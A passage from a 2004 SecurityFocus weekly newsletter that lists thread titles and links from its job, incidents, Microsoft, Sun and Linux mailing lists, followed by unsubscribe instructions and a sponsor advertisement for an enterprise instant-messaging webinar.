16. MITRE - Information Assurance Architect - Hanover, M... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367912
17. Security Consultants: Wash. D.C. or CA- ArcSight (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367911
18. Security Architect for Federal.- Wash D.C. ArcSight (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367910
19. WEST COAST SALES ENGINEER (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367909
20. Security Engineer - LOS ANGELES, CA - Financial Ins... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367908
21. Director / VP Business Development--Network Securit... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367907
22. IT Security Architect required in the UK (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/367906
VI. INCIDENTS LIST SUMMARY
--------------------------
1. Remote registry changes from an ISA server (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/367961
2. Unknown Malware found csdiv.dll (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/367896
3. Scob infection statistics, etc.. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/367563
VII. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
NO NEW POSTS FOR THE WEEK 2004-06-29 to 2004-07-06.
VIII. MICROSOFT FOCUS LIST SUMMARY
----------------------------------
1. supressing IE (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/368056
2. Non Admin Rights + Visual Studio (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367999
3. Consumer Security Web Site (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367705
4. Administrivia: Out of Office Autoreplies (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367638
5. Article Announcement: Redmond's Butterfly Effect (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367635
6. SecurityFocus Microsoft Newsletter #195 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367553
7. RE: Consumer Security Web Site (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/367497
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. secure NFS problem (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/367947
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. Weird! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/368067
2. Last login missing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/368004
3. Error installing Clamav? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/368000
4. just running tcpdump makes promisc mode? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/367997
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: FaceTime
Free Webinar! Enterprise IM: How IT Managers Can Survive. Featured Speaker:
Nate Root, Senior Analyst, Forrester Research. IT directors and security
managers will gain new insights to balance compliance and security risks.
Highlights an integrated solution from FaceTime Communications and MSN
Messenger Connect for Enterprises. Ideal for financial services,
healthcare, energy companies and other regulated organizations.
View the webinar now!
http://www.securityfocus.com/sponsor/FaceTime_sf-news_040706
------------------------------------------------------------------------
[ reply ]